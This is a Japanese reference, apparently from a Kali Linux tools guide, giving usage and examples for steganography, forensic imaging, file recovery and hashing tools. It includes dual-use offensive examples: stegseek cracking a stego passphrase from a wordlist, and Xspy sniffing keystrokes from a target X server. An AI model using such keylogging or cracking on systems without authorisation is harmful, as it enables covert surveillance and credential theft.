-n, --nocolor disable colors in output
-c, --continue continue cracking after a result has been found.
(A stego file might contain multiple embedded files)
-a, --accessible simplify the output to be more screen reader friendly
■ 使用例
root@kali:~# stegseek cat-with-message.jpg passwords.txt
[i] Found passphrase: "hello"
[i] Original filename: "message.txt".
[i] Extracting to "cat-with-message.jpg.out".
root@kali:~# cat cat-with-message.jpg.out
Hello World
# 暗号化なしでデータを画像に埋め込み
root@kali:~# steghide embed -ef message.txt -cf cat.jpg -sf cat-with-message.jpg -e none -p hello
# steghideでデータが埋め込まれているかどうかを検知し、暗号化なしでデータが埋め込まれている場合は展開
root@kali:~# stegseek --seed cat-with-message.jpg -
[i] Found (possible) seed: "5f326c48"
Plain size: 44.0 Byte(s) (compressed)
Encryption Algorithm: none
Encryption Mode: cbc
[i] Original filename: "message.txt".
[i] Extracting to stdout.
Hello World
SNOW
行末に空白を追加することによって、ASCIIテキスト中にメッセージを隠します。
■ 使用方法
root@kali:~# man stegsnow
SYNOPSIS
stegsnow [ -CQS ] [ -h | --help ] [ -V | --version ] [ -p passwd ] [ -l line-len ] [ -f file | -m message ] [ infile [ outfile ]]
OPTIONS
-C Compress the data if concealing, or uncompress it if extracting.
-f message-file
The contents of this file will be concealed in the input text file.
-l line-len
When appending whitespace, stegsnow will always produce lines shorter than this value. By default it is set to 80.
-m message-string
The contents of this string will be concealed in the input text file. Note that, unless a newline is somehow included in the
string, a newline will not be printed when the message is extracted.
-p password
If this is set, the data will be encrypted with this password during concealment, or decrypted during extraction.
-Q Quiet mode. If not set, the program reports statistics such as compression percentages and amount of available storage space
used.
-S Report on the approximate amount of space available for hidden message in the text file. Line length is taken into account, but
other options are ignored.
-V, --version
Display usage information and exit.
-h, --help
Display usage information and exit.
■ 使用例
root@kali:~# curl https://fakerapi.it/api/v2/texts?_quantity=1\&_characters=500 | jq -r '.data[0].content' > sample.txt
# テキストファイルに「ハローワールド」というテキストを埋め込み
root@kali:~# stegsnow -C -m "ハローワールド" -p hello sample.txt steg-sample.txt
# 差分を比較(行末にスペースとタブが追加されている)
root@kali:~# diff -u sample.txt steg-sample.txt --color
--- sample.txt 2024-11-19 09:17:45.819427058 +0000
+++ steg-sample.txt 2024-11-19 09:20:40.697871514 +0000
@@ -1 +1,17 @@
I can't understand it myself to begin at HIS time of life. The King's argument was, that you think you could only hear whispers now and then hurried on, Alice started to her great disappointment it was very likely true.) Down, down, down. There was nothing on it in asking riddles that have no answers.' 'If you knew Time as well as I do,' said Alice loudly. 'The idea of having nothing to do." Said the mouse doesn't get out." Only I don't put my arm round your waist,' the Duchess said to the.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
# スペースとタブを視覚化
root@kali:~# diff --old-line-format='' --unchanged-line-format='' --new-line-format='%L' sample.txt steg-sample.txt | sed 's/\t/→/g; s/ */●/g'
→●→●→●→●→●→●→●→●→●
●→●→●→●→●→→→●→●
→●→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●→●
●→●→→●→●→●→●→●→●
→→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●
→●→●→●→●→●→→●→●→●
●→●→●→●→●→●→●→●→→●
●→●→●→●→●→→●→●→●→●
●→●→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●
→●→●→●→→●→●→→→
→→●
root@kali:~# stegsnow -C -p hello steg-sample.txt
ハローワールド
Xspy
リモートまたはローカルのX-Windowsサーバー上のキー入力をスニッフィングするキーロガーです。
■ 使用例
# 標的ホストを指定してキーロガーを起動
root@kali:~# xspy 192.168.11.4
opened 192.168.11.4:0 for snoopng
xtermを起動してキー入力
root@kali:~# xspy 192.168.11.4
opened 192.168.11.4:0 for snoopng
hello
Forensics Tools
Forensics
Autopsy
ディスクイメージやVMファイル、ローカルストレージデバイスなどからファイルを抽出してフォレンジック分析するためのGUIツールです。
■ 使用方法
root@kali:~# autopsy --help
General options:
--help show this help
--jdkhome <path> path to Java(TM) 2 SDK, Standard Edition
-J<jvm_option> pass <jvm_option> to JVM
--cp:p <classpath> prepend <classpath> to classpath
--cp:a <classpath> append <classpath> to classpath
Module reload options:
--reload /path/to/module.jar install or reinstall a module JAR file
Additional module options:
-p, --listAllIngestProfiles
-i, --dataSourceObjectId <arg>
-c, --createCase
-n, --caseName <arg>
-t, --caseType <arg>
-o, --caseBaseDir <arg>
-l, --listAllDataSources
-g, --generateReports [<arg>]
-r, --runIngest [<arg>]
-a, --addDataSource
-s, --dataSourcePath <arg>
-l, --liveAutopsy [<arg>]
--modules
--refresh Refresh all catalogs
--list Prints the list of all modules, their versions and enablement status
--install <arg1>...<argN> Installs provided JAR files as modules
--disable <arg1>...<argN> Disable modules for specified codebase names
--enable <arg1>...<argN> Enable modules for specified codebase names
--update <arg1>...<argN> Updates all or specified modules
--update-all Updates all modules
--extra-uc <arg> Add a extra Update Center (URL)
--direct-disable <arg1>...<argN> Disable module immediately
Core options:
--laf <LaF classname> use given LookAndFeel class instead of the default
--fontsize <size> set the base font size of the user interface, in points
--locale <language[:country[:variant]]> use specified locale
--userdir <path> use specified directory to store user settings
--cachedir <path> use specified directory to store user cache, must be different from userdir
--nosplash do not show the splash screen
■ 使用例
root@kali:~# autopsy
バックアップイメージを読み込みファイルの一覧やイベント(ファイルアクセスなど)のタイムラインを表示
dc3dd
GNU ddにオンザフライでのハッシュ値計算、進捗状況の表示、ファイルのスプリット出力などの機能を追加した拡張版です。
■ 使用方法
root@kali:~# dc3dd --help
------
usage:
------
dc3dd [OPTION 1] [OPTION 2] ... [OPTION N]
*or*
dc3dd [HELP OPTION]
where each OPTION is selected from the basic or advanced
options listed below, or HELP OPTION is selected from the
help options listed below.
--------------
basic options:
--------------
if=DEVICE or FILE Read input from a device or a file (see note #1
below for how to read from standard input). This
option can only be used once and cannot be
combined with ifs=, pat=, or tpat=.
ifs=BASE.FMT Read input from a set of files with base name
BASE and sequential file name extensions
conforming to the format specifier FMT (see note
#4 below for how to specify FMT). This option
can only be used once and cannot be combined with
if=, pat=, or tpat=.
of=FILE or DEVICE Write output to a file or device (see note #2
below for how to write to standard output). This
option can be used more than once (see note #3
below for how to generate multiple outputs).
hof=FILE or DEVICE Write output to a file or device, hash the
output bytes, and verify by comparing the output
hash(es) to the input hash(es). This option can
be used more than once (see note #3 below for
how to generate multiple outputs).
ofs=BASE.FMT Write output to a set of files with base name BASE
and sequential file name extensions generated from
the format specifier FMT (see note #4 below for
how to specify FMT). This option can be used more
than once (see note #3 below for how to generate
multiple outputs). Specify the maximum size of
each file in the set using ofsz=.
hofs=BASE.FMT Write output to a set of files with base name BASE
and sequential file name extensions generated from
the format specifier FMT (see note #4 below for
how to specify FMT). Hash the output files and
verify by comparing the output hash(es) to the
input hash(es). This option can be used more than
once (see note #3 below for how to generate
multiple outputs). Specify the maximum size of
each file in the set using ofsz=.
ofsz=BYTES Set the maximum size of each file in the sets of
files specified using ofs= or hofs= to
BYTES (see note #5 below). A default value for
this option may be set at compile time using
-DDEFAULT_OUTPUT_FILE_SIZE followed by the desired
value in BYTES.
hash=ALGORITHM Compute an ALGORITHM hash of the input and also
of any outputs specified using hof=, hofs=,
or fhod=, where ALGORITHM is one of md5, sha1,
sha256, or sha512. This option may be used once
for each supported ALGORITHM. Alternatively,
hashing can be activated at compile time using one
or more of -DDEFAULT_HASH_MD5,-DDEFAULT_HASH_SHA1,
-DDEFAULT_HASH_SHA256, and -DDEFAULT_HASH_SHA512.
log=FILE Log I/O statistcs, diagnostics, and total hashes
of input and output to FILE. If hlog= is not
specified, piecewise hashes of multiple file
input and output are also logged to FILE. This
option can be used more than once to generate
multiple logs.
hlog=FILE Log total hashes and piecewise hashes to FILE.
This option can be used more than once to generate
multiple logs.
mlog=FILE Create hash log that is easier for machine to read
-----------------
advanced options:
-----------------
fhod=DEVICE The same as hof=DEVICE, with additional
hashing of the entire output DEVICE. This option
can be used more than once (see note #3 below
for how to generate multiple outputs).
rec=off By default, zeros are written to the output(s) in
place of bad sectors when the input is a device.
Use this option to cause the program to instead
exit when a bad sector is encountered.
wipe=DEVICE Wipe DEVICE by writing zeros (default) or a
pattern specified by pat= or tpat=.
hwipe=DEVICE Wipe DEVICE by writing zeros (default) or a
pattern specified by pat= or tpat=. Verify
DEVICE after writing it by hashing it and
comparing the hash(es) to the input hash(es).
pat=HEX Use pattern as input, writing HEX to every byte
of the output. This option can only be used once
and cannot be combined with if=, ifs=, or
tpat=.
tpat=TEXT Use text pattern as input, writing the string TEXT
repeatedly to the output. This option can only be
used once and cannot be combined with if=, ifs=,
or pat=.
cnt=SECTORS Read only SECTORS input sectors. Must be used
with pat= or tpat= if not using the pattern with
wipe= or hwipe= to wipe a device.
iskip=SECTORS Skip SECTORS sectors at start of the input device
or file.
oskip=SECTORS Skip SECTORS sectors at start of the output
file. Specifying oskip= automatically
sets app=on.
app=on Do not overwrite an output file specified with
of= if it already exists, appending output instead.
ssz=BYTES Unconditionally use BYTES (see note #5 below) bytes
for sector size. If ssz= is not specified,
sector size is determined by probing the device;
if the probe fails or the target is not a device,
a sector size of 512 bytes is assumed.
bufsz=BYTES Set the size of the internal byte buffers to BYTES
(see note #5 below). This effectively sets the
maximum number of bytes that may be read at a time
from the input. BYTES must be a multiple of sector
size. Use this option to fine-tune performance.
verb=on Activate verbose reporting, where sectors in/out
are reported for each file in sets of files
specified using ifs=, ofs=, or hofs=.
Alternatively, verbose reporting may be activated
at compile time using -DDEFAULT_VERBOSE_REPORTING.
nwspc=on Activate compact reporting, where the use
of white space to divide log output into
logical sections is suppressed. Alternatively,
compact reporting may be activated at compile
time using -DDEFAULT_COMPACT_REPORTING.
b10=on Activate base 10 bytes reporting, where the
progress display reports 1000 bytes instead
of 1024 bytes as 1 KB. Alternatively, base 10
bytes reporting may be activated at compile
time using -DDEFAULT_BASE_TEN_BYTES_REPORTING.
corruptoutput=on For verification testing and demonstration
purposes, corrupt the output file(s) with extra
bytes so a hash mismatch is guaranteed.
-------------
help options:
-------------
--help display this help and exit
--version output version information and exit
--flags display compile-time flags and exit
■ 使用例
# ddでデバイスのバックアップを作成
root@kali:~# dd if=/dev/loop0 of=/root/backup.img bs=64K conv=noerror,sync
1600+0 records in
1600+0 records out
104857600 bytes (105 MB, 100 MiB) copied, 0.485763 s, 216 MB/s
# dc3ddでデバイスのバックアップを作成
root@kali:~# dc3dd if=/dev/loop0 hof=/root/backup.img hash=sha256
device size: 204800 sectors (probed), 104,857,600 bytes
sector size: 512 bytes (probed)
104857600 bytes ( 100 M ) copied ( 100% ), 1 s, 99 M/s
104857600 bytes ( 100 M ) hashed ( 100% ), 0 s, 246 M/s
input results for device `/dev/loop0':
204800 sectors in
0 bad sectors replaced by zeros
1d0396cefc83db42fbffa24baf34ec24ad763569bbc9d017a0b69e814aae69a8 (sha256)
output results for file `/root/backup.img':
204800 sectors out
[ok] 1d0396cefc83db42fbffa24baf34ec24ad763569bbc9d017a0b69e814aae69a8 (sha256)
dc3dd completed at 2024-12-06 10:27:14 +0000
dcfldd
GNU ddにオンザフライでのハッシュ値計算、ステータス出力、ファイルのスプリット出力などの機能を追加した拡張版です。
■ 使用方法
root@kali:~# dcfldd --help
Usage: dcfldd [OPTION]...
bs=BYTES force ibs=BYTES and obs=BYTES (default=32768)
cbs=BYTES convert BYTES bytes at a time
conv=KEYWORDS convert the file as per the comma separated keyword list
count=BLOCKS copy only BLOCKS input blocks
limit=BYTES similar to count but using BYTES instead of BLOCKS
ibs=BYTES read BYTES bytes at a time
if=FILE read from FILE instead of stdin
obs=BYTES write BYTES bytes at a time
of=FILE write to FILE instead of stdout
of:=COMMAND exec and write output to process COMMAND
seek=BLOCKS skip BLOCKS obs-sized blocks at start of output
skip=BLOCKS skip BLOCKS ibs-sized blocks at start of input
pattern=HEX use the specified binary pattern as input
textpattern=TEXT use repeating TEXT as input
errlog=FILE send error messages to FILE as well as stderr
hash=NAME do hash calculation (md5, sha1, sha256, sha384 or sha512)
hashlog=FILE send hash output to FILE instead of stderr
hashwindow=BYTES perform a hash on every BYTES amount of data
hashlog:=COMMAND exec and write hashlog to process COMMAND
ALGORITHMlog:=COMMAND also works in the same fashion of hashlog:=COMMAND
hashconv=[before|after] perform the hashing before or after the conversions
hashformat=FORMAT display each hashwindow according to FORMAT
totalhashformat=FORMAT display the total hash value according to FORMAT
status=[on|off] display a continual status message on stderr
statusinterval=N update the status message every N blocks
sizeprobe=[if|of|BYTES] what to use as value to percentage indicator
split=BYTES write every BYTES amount of data to a new file
splitformat=[TEXT|MAC|WIN] the file extension format for split operation
vf=FILE verify that FILE matches the specified input
verifylog=FILE send verify results to FILE instead of stderr
verifylog:=COMMAND exec and write verify results to process COMMAND
--help display this help and exit
--version output version information and exit
■ 使用例
# ddでデバイスのバックアップを作成
root@kali:~# dd if=/dev/loop0 of=/root/backup.img bs=64K conv=noerror,sync
1600+0 records in
1600+0 records out
104857600 bytes (105 MB, 100 MiB) copied, 0.485763 s, 216 MB/s
# dcflddでデバイスのバックアップを作成
root@kali:~# dcfldd if=/dev/loop0 of=/root/backup.img hash=sha256
3072 blocks (96Mb) written.
Total (sha256): 1d0396cefc83db42fbffa24baf34ec24ad763569bbc9d017a0b69e814aae69a8
3200+0 records in
3200+0 records out
dd_rescue
故障したドライブからデータをコピーする際に可能な限り追加ダメージを与えないようにコピーします。
■ 使用方法
root@kali:~# dd_rescue --help
USAGE: dd_rescue [options] infile outfile
Options: -s ipos start position in input file (default=0),
-S opos start position in output file (def=ipos),
-b softbs block size for copy operation (def=131072, 1048576 for -d),
-B hardbs fallback block size in case of errs (def=4096, 512 for -d),
-e maxerr exit after maxerr errors (def=0=infinite),
-m maxxfer maximum amount of data to be transferred (def=0=inf),
-M avoid extending outfile,
-x count opos from the end of outfile (eXtend),
-y syncsz frequency of fsync calls in bytes (def=512*softbs),
-l logfile name of a file to log errors and summary to (def=""),
-o bbfile name of a file to log bad blocks numbers (def=""),
-r reverse direction copy (def=forward),
-R repeatedly write same block (def if infile is /dev/zero),
-t truncate output file at start (def=no),
-T truncate output file at last pos (def=no),
-u undo writes by deleting outfile and issuing fstrim
-d/D use O_DIRECT for input/output (def=no),
-k use efficient in-kernel zerocopy splice,
-P use fallocate to preallocate target space,
-L plug1[=par1[:par2]][,plug2[,..]] load plugins,
-w abort on Write errors (def=no),
-W read target block and avoid Writes if identical (def=no),
-a detect zero-filled blocks and write spArsely (def=no),
-A Always write blocks, zeroed if err (def=no),
-i interactive: ask before overwriting data (def=no),
-f force: skip some sanity checks (def=no),
-p preserve: preserve ownership, perms, times, attrs (def=no),
-C limit rateControl: avoid xfer data faster than limit B/s
-Y oname Secondary output file (multiple possible),
-F off[-off]r/rep[,off[-off]w/rep[,...]] fault injection (hardbs off) r/w
-q quiet operation,
-v verbose operation,
-c 0/1 switch off/on colors (def=auto),
-V display version and exit,
-h display this help and exit.
Instead of infile, -z/Z SEED or -z/Z SEEDFILE may be specified, taking the PRNG
from libc or frandom (RC4 based) as input. SEED = 0 means a time based seed;
Using /dev/urandom as SEEDFILE gives good pseudo random numbers.
Likewise, -3 SEED/SEEDFILE will overwrite ofile 3 times (r,ir,0, BSI M7.15).
With -4 SEED/SEEDFILE you get an additional random pass (r,ir,r2,0).
With -2 SEED/SEEDFILE you only get one random pass (r,0).
Sizes may be given in units b(=512), k(=1024), M(=1024^2) or G(1024^3) bytes
This program is useful to rescue data in case of I/O errors, because
it does not normally abort or truncate the output.
It may also help data protection by securely overwriting data.
There are plugins for compression, hashing and encryption.
Have a look a the man page for more details and long options.
■ 使用例
# エラーセクターを挿入したブロックデバイスを作成
root@kali:~# dmsetup create baddevice << EOF
0 2000 linear /dev/loop0 0
2000 96 error
2096 202704 linear /dev/loop0 2096
EOF
# エラーのあるデバイスをイメージにコピー
root@kali:~# dd_rescue /dev/mapper/baddevice backup.img
dd_rescue: (info): Using softbs=128.0kiB, hardbs=4.0kiB
dd_rescue: (info): expect to copy 102400.0kiB from /dev/mapper/baddevice
dd_rescue: (info): ipos: 1000.0k, opos: 1000.0k, xferd: 1000.0k
* errs: 0, errxfer: 0.0k, succxfer: 1000.0k
+curr.rate: 22847kB/s, avg.rate: 23739kB/s, avg.load: 19.0%
>-........................................< 0% ETA: 0:00:04
dd_rescue: (warning): read /dev/mapper/baddevice (1000.0kiB): Input/output error!
dd_rescue: (warning): Bad block reading /dev/mapper/baddevice: 250
dd_rescue: (info): ipos: 1004.0k, opos: 1004.0k, xferd: 1004.0k
* errs: 1, errxfer: 4.0k, succxfer: 1000.0k
+curr.rate: 17965kB/s, avg.rate: 23171kB/s, avg.load: 18.8%
>x........................................< 0% ETA: 0:00:04
[...]
dd_rescue: (info): ipos: 102400.0k, opos: 102400.0k, xferd: 102400.0k
errs: 12, errxfer: 48.0k, succxfer: 102352.0k
+curr.rate: 6477kB/s, avg.rate: 8669kB/s, avg.load: 34.1%
>x----------------------------------------< 100% TOT: 0:00:12
dd_rescue: (warning): There were 25 errors!
Ext4magic
ext3 または ext4 パーティションからファイルを復元するディスクユーティリティです。
■ 使用方法
root@kali:~# man ext4magic
SYNOPSIS
ext4magic {-M|-m} [-j <journal_file>] [-d <target_dir>] <filesystem>
ext4magic [-S|-J|-H|-V|-T] [-x] [-j <journal_file>] [-B n|-I n|-f <file_name>|-i <input_list>] [-t n|[[-a n][-b n]]] [-d <target_dir>]
[-R|-r|-L|-l] [-Q] <filesystem>
OPTIONS
-M Try to recover all files. This option should be used if the entire Filesystem was deleted.
-m Try to recover only all deleted files. Use this option with a partially deleted Filesystem.
-S Print the filesystem superblock, the option. -x allows the additional display of content of the group descriptor table.
-J Print the content of the Journal superblock. This option also can used to force loading the Journal. This has a flow control ef‐
fect in ext4magic with some other options.
-H Output a histogram of time stamps from all filesystem Inodes. Allows you to determine the exact time of changes in the filesys‐
tem. In connection with a directory name or a directory Inode, only the time stamps of this directory tree will be displayed.
There are not evaluated any changes, only one per Inode. either the last change or the deletion time per Inode arrives to dis‐
play. If present (ext4), it also create a histogram of create time stamps.
-V Print the version of ext4magic and libext2fs
-T Display the entire transaction list of all copies of data blocks in the Journal. In conjunction with the -B ; -I and -f , only
display the corresponding data blocks for this data . The optional option -x allows an additional transmission time of the trans‐
actions, but only if the block is a Inode block. The print is in the same order as the data in journal. You can make conclusions
from the data received in the Journal. After the import of backups or after change of timestamps of files, the additional trans‐
mission time will display not always the real transmission time. If here absolutely incorrect time entries, then check if you
using a journal of a read-write open file system.
-x controls optional the output format and the information content of certain commands. Affects the following options: -S ; -H ; -T
; -B ; -I ; -f ; -L ; -l Detailed description see there.
-B n n is the data block number of a filesystem datablock. Without further options it print a "one-byte" hex+ASCII dump from the data
block on the filesystem, like the "hexdump -C" command. The optional option -x produced a "four byte" hex+ASCII output.
-I n n is the Inode number. Without any other option, the output is the content of the real filesystem Inode. With a optional -x addi‐
tional output of a list of all data blocks addressed by this Inode. If Inode is a directory Inode, the content of the directory
entries also printed.
-f <filename>
the function is the same as -I n only here is the <filename> given instead the Inode number. ext4magic search the filesystem to
find the Inode number. The filename can be a directory or a filename and must be specified here from the root directory of this
filesystem, and not from the root directory of the LINUX system.
-s blocksize -n blocknumber
with this options you can select the backup superblock. blocksize can be 1024, 2048 or 4096. blocknumber is the block number of
the backup superblock this depends on the block size. Use the same values as with "fsck" or "debugfs" or use the output of "mkfs
-n .." to determine the correct value.
-c This will attempt to find the journal using the data of the superblock. Can help if the first inode blocks of the file system
are damaged.
-D trying a restore of all files from a badly damaged file system. The combination of all these Expert Options try a file system re‐
store if the superblock broken and the beginning of the file system is corrupted or overwritten. This can only work if e2fsck
has not yet changed the faulty file system.
-Q This is a optional high quality Option for recover and only impact with " -r " and " -R ". Without this option, any valid file
name restored from the directories and you can set the " before " time stamp to a time in which all files are deleted. So you
will find the maximum possible number of files. It need not necessarily be found old directory data blocks in the Journal. How‐
ever, there are some files found too much. In this mode, re-used file name and reused Inode can not be noticed. As a result some
file will be created with the extension " "#" or some files created with wrong content. You have to check the files and find bad
files and delete itself.
-a n with this option you can set the " after " time
-b n with this option you can set the " before " time
-t n is an indirect time option. you can use it with the options -B ; -I ; -f The value n is the transaction number. With this option
you can print, list, or recover the data from this transaction number. you can find the transaction numbers with the option -T
or in the print of the Inode content.
-j <journal_file>
optional you can select a external copy of the Journal file. Without this option, automatically the internal Journal or, if con‐
figured, the external Journal on a block device will used.
-d <target_dir>
select the output directory. There, the recovered files were written. If it does not exist, it is created. By default, created
files are written to the subdirectory " RECOVERDIR " in the workpath of the actual shell. This output directory can not be on the
same filesystem to be tested filesystem, and should have sufficient space to write the recovered files. The filesystem on this
directory should be also ext3/4, otherwise, not LINUX like filesystems generate some errors while writing the file properties.
Either you must first changed with the shell in such a suitable filesystem, or you must specify the -d with a target to such a
directory
-i <input_list>
input_list is a input file. Must contain a list with double-quoted filenames. The files from the list will be restored with op‐
tion -r or -R
-L Prints the list of all filenames and Inode number of the selected directory tree. Included here also are deleted files and
deleted directory trees. With the additional option. -x the file names are printed double-quoted. You can use it for a "Input
list" with option -i
-l Prints a list of all filenames which have not allocated data blocks. At the beginning of the line are the percentage of unallo‐
cated data blocks. After deletion you find here all the file names you can recover with the Journal data. If you use a very old
value for the "before" time, it is possible there are files whose data blocks reused and these files in the interim also been
deleted. Also included in the list all files without data blocks, symbolic links, empty and other special files.
-r applied to directories, all files without conflicts with the occupied blocks will recovered. This are all you can sea with the
option -l and be 100% unallocated. This options only recover deleted files and files without data blocks, in example: symbolic
links or empty files.
-R recovers directory tree, is the same as -r
■ 使用例
# 任意のファイルを削除する
root@kali:~# rm /mnt/example/database/database.sqlite
# ext4magicでファイルの復元を実行
root@kali:~# ext4magic /dev/loop0 -m -d recovered
Warning: Activate magic-scan or disaster-recovery function, may be some command line options ignored
"recovered" accept for recoverdir
Filesystem in use: /dev/loop0
Using internal Journal at Inode 8
Activ Time after : Sun Dec 8 02:24:48 2024
Activ Time before : Sun Dec 8 02:39:47 2024
Inode 2 is allocated
-------- recovered/example/public/favicon.ico
-------- recovered/example/resources/css/app.css
MAGIC-1 : start lost directory search
MAGIC-2 : start lost file search
-------- recovered/MAGIC-2/application/vnd.sqlite3\012-/I_0000000148.unknown
MAGIC-2 : start lost in journal search
-------- recovered/MAGIC-2/text/plain/I_0000025766.txt
MAGIC-3 : start ext4-magic-scan search
-------- recovered/MAGIC-3/text/plain/0000008708.txt
-------- recovered/MAGIC-3/text/plain/0000008709.txt
-------- recovered/MAGIC-3/text/plain/0000008710.txt
ext4magic : EXIT_SUCCESS
# 削除したファイルと復元したファイルのハッシュ値が一致
root@kali:~# sha256sum database.sqlite
eedcb75a8b2b69c690525ab05f103f173ff665b7ba5355a3b0314c4721817836 database.sqlite
root@kali:~# sha256sum I_0000000148.unknown
eedcb75a8b2b69c690525ab05f103f173ff665b7ba5355a3b0314c4721817836 I_0000000148.unknown
# ファイルを先頭から1バイトずつ比較しても差異は見つからない
root@kali:~# cmp -b database.sqlite I_0000000148.unknown
Foremost
メタデータのない断片化した生データをヘッダ、フッタ、および内部データ構造に基づいて解析してファイルを復元します(ファイルカービング)。
■ 使用方法
root@kali:~# foremost -h
$ foremost [-v|-V|-h|-T|-Q|-q|-a|-w-d] [-t <type>] [-s <blocks>] [-k <size>]
[-b <size>] [-c <file>] [-o <dir>] [-i <file]
-V - display copyright information and exit
-t - specify file type. (-t jpeg,pdf ...)
-d - turn on indirect block detection (for UNIX file-systems)
-i - specify input file (default is stdin)
-a - Write all headers, perform no error detection (corrupted files)
-w - Only write the audit file, do not write any detected files to the disk
-o - set output directory (defaults to output)
-c - set configuration file to use (defaults to foremost.conf)
-q - enables quick mode. Search are performed on 512 byte boundaries.
-Q - enables quiet mode. Suppress output messages.
-v - verbose mode. Logs all messages to screen
■ 使用例
root@kali:~# foremost -v -i /dev/sda1 -o ./recover
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File
Foremost started at Sat Oct 5 03:02:58 2024
Invocation: foremost -i /dev/sda1 -o ./recover -v
Output directory: ./recover
Configuration file: /etc/foremost.conf
Processing: /dev/sda1
|------------------------------------------------------------------
File: /dev/sda1
Start: Sat Oct 5 03:02:58 2024
Length: 80 GB (85998951424 bytes)
Num Name (bs=512) Size File Offset Comment
*0: 00363360.gif 1 KB 186040796 (0 x 18759)
1: 00290931.htm 72 KB 148956770
2: 00291076.htm 142 B 149031056
3: 00291076_1.htm 293 B 149031200
4: 00291078.htm 162 B 149031976
5: 00291078_1.htm 204 B 149032144
[...]
Guymager
並列圧縮を使用した高速マルチスレッドエンジンで高速にディスクイメージを作成します。操作はGUIで行います。
■ 使用方法
root@kali:~# man guymager
SYNOPSIS
guymager [log=log_file] [cfg=configuration_file] [options]
OPTIONS
log=log_file
By default, guymager uses /var/log/guymager.log as its log file. This option allows for specifying a different file.
cfg=configuration_file
The default configuration file is /etc/guymager/guymager.cfg. This option allows for specifying a different file. Guymager cre‐
ates a template configuration file when the option -cfg=template.cfg is given.
All other configuration options may be specified on the command line and/or in the configuration file. See /etc/guymager/guymager.cfg
for a description of all possible options. In case an option is specified in the configuration file and on the command line, the command
line dominates.
EXIT CODES
Guymager normally returns an exit code of 0. Exit code 1 means that Guymager terminated because the AutoExit function became active. All
other exit codes are related to internal Guymager or Qt errors.
■ 使用例
root@kali:~# guymager
デバイスを選択してrawイメージ(dd)を作成
hashdeep
ファイルのハッシュ値を計算します。以下のハッシュアルゴリズムをサポートします。md5、sha1、sha256、tiger、whirlpoolのハッシュアルゴリズムに対応しています。
■ 使用方法
root@kali:~# hashdeep -h
$ hashdeep [OPTION]... [FILES]...
-c <alg1,[alg2]> - Compute hashes only. Defaults are MD5 and SHA-256
legal values: md5,sha1,sha256,tiger,whirlpool,
-p <size> - piecewise mode. Files are broken into blocks for hashing
-r - recursive mode. All subdirectories are traversed
-d - output in DFXML (Digital Forensics XML)
-k <file> - add a file of known hashes
-a - audit mode. Validates FILES against known hashes. Requires -k
-m - matching mode. Requires -k
-x - negative matching mode. Requires -k
-w - in -m mode, displays which known file was matched
-M and -X act like -m and -x, but display hashes of matching files
-e - compute estimated time remaining for each file
-s - silent mode. Suppress all error messages
-b - prints only the bare name of files; all path information is omitted
-l - print relative paths for filenames
-i/-I - only process files smaller than the given threshold
-o - only process certain types of files. See README/manpage
-v - verbose mode. Use again to be more verbose
-d - output in DFXML; -W FILE - write to FILE.
-j <num> - use num threads (default 8)
■ 使用例
root@kali:~# hashdeep -c sha256 -r .
%%%% HASHDEEP-1.0
%%%% size,sha256,filename
## Invoked from: /usr/local/src/ec-cube/src
## # hashdeep -c sha256 -r .
##
31,f60574ee8ab3b617af2622b1c24e1f59bda780b84318ccdcb5cf004cc07d3e98,/usr/local/src/ec-cube/src/.htaccess
778,5ff384fa88ddd0c779b874938b15c5e6f5cea5ccee8650f9258d4aabef3c97fe,/usr/local/src/ec-cube/src/Eccube/Util/ReflectionUtil.php
2333,c42264839ae46895bee5cf852a9bc2cd4822a82381e48222ff1e48cb578e82b5,/usr/local/src/ec-cube/src/Eccube/Request/Context.php
6389,3265735c5015c98ea9ee6a048666539d9b627f04649fb154aede7161423f04b1,/usr/local/src/ec-cube/src/Eccube/Util/CacheUtil.php
1452,011e1a9f77192c30f614a7640ea20b9c5876da93c03ec5e2b88b3a1453e630dd,/usr/local/src/ec-cube/src/Eccube/Util/FormUtil.php
1309,b33efe65bc3bf415c35813b14c6f2adbaa8c7bea8bc59287dfd27861ea506c66,/usr/local/src/ec-cube/src/Eccube/Util/EntityUtil.php
767,afb734ca306cef2faca2a6d1ebd0f1d61ea43eed04a034e7b17461c76d4d84ad,/usr/local/src/ec-cube/src/Eccube/Util/FilesystemUtil.php
[...]
Hashrat
標準入力やファイルのハッシュ値を計算します。md5、sha1、sha256、sha512、whirlpool、jh-244、jh256、jh-384、jh-512 のハッシュアルゴリズムおよびそれらのHMAC版に対応しています。
■ 使用方法
root@kali:~# hashrat --help
Usage:
hashrat [options] [path to hash]...
hashrat -c [options] [input file of hashes]...
Options:
--help Print this help
-help Print this help
-? Print this help
--version Print program version
-version Print program version
-md5 Use md5 hash algorithm
-sha1 Use sha1 hash algorithm
-sha256 Use sha256 hash algorithm
-sha512 Use sha512 hash algorithm
-whirl Use whirlpool hash algorithm
-whirlpool Use whirlpool hash algorithm
-jh224 Use jh-224 hash algorithm
-jh256 Use jh-256 hash algorithm
-jh384 Use jh-384 hash algorithm
-jh512 Use jh-512 hash algorithm
-hmac HMAC using specified hash algorithm
-totp <secret> TOTP code with secret, defaults to google-authenticator compatible setup
-totp <url> TOTP code from supplied otpauth url (option can distinguish between secret and url)
-digits <n> produce otp codes with <n> digits
-period <n> produce otp codes with period/lifetime of <n> seconds
-8 Encode with octal instead of hex
-10 Encode with decimal instead of hex
-H Encode with UPPERCASE hexadecimal
-HEX Encode with UPPERCASE hexadecimal
-32 Encode with base32 instead of hex
-base32 Encode with base32 instead of hex
-c32 Encode with Crockford base32 instead of hex
-w32 Encode with word-safe base32 instead of hex
-z32 Encode with zbase32 instead of hex
-64 Encode with base64 instead of hex
-base64 Encode with base64 instead of hex
-i64 Encode with base64 with rearranged characters
-p64 Encode with base64 with a-z,A-Z and _-, for best compatibility with 'allowed characters' in websites.
-r64 Encode with base64 with a-z,A-Z and _-, rfc4648 compatible.
-rfc4648 Encode with base64 with a-z,A-Z and _-, rfc4648 compatible.
-x64 Encode with XXencode style base64.
-u64 Encode with UUencode style base64.
-g64 Encode with GEDCOM style base64.
-a85 Encode with ASCII85.
-z85 Encode with ZEROMQ variant of ASCII85.
-t Output hashes in traditional md5sum, shaXsum format
-trad Output hashes in traditional md5sum, shaXsum format
